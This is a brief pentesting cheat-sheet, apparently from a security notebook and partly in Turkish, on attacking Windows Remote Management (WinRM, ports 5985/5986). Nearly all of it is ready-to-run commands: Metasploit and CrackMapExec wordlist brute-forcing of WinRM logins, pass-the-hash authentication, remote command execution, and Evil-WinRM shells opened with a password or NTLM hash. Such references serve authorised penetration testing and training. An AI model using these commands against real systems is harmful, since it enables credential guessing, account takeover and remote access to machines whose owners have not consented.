Pentesing WINRM 5985,5986

WINRM sayesinden cihazlara uzaktan bağlanabiliriz.

BruteForce & Login WinRM

Using Metasploit

use auxiliary/scanner/winrm/winrm_login
msf auxiliary(scanner/winrm/winrm_login) > set rhosts 10.10.10.10
msf auxiliary(scanner/winrm/winrm_login) > set user_file /root/Desktop/user.txt
msf auxiliary(scanner/winrm/winrm_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/winrm/winrm_login) > set stop_on_success true
msf auxiliary(scanner/winrm/winrm_login) > run

Using Crackmapexec

crackmapexec winrm 10.10.10.10 -d <FORMULA1.local> -u usernames.txt -p passwords.txt
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH>
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"

Using Evil-WinRM

evil-winrm -i <IP> -u username -p 'password'
evil-winrm -u <username> -H <Hash> -i <IP>
PreviousPentesting RDP - 3389Next2FA/OTP Bypass

Last updated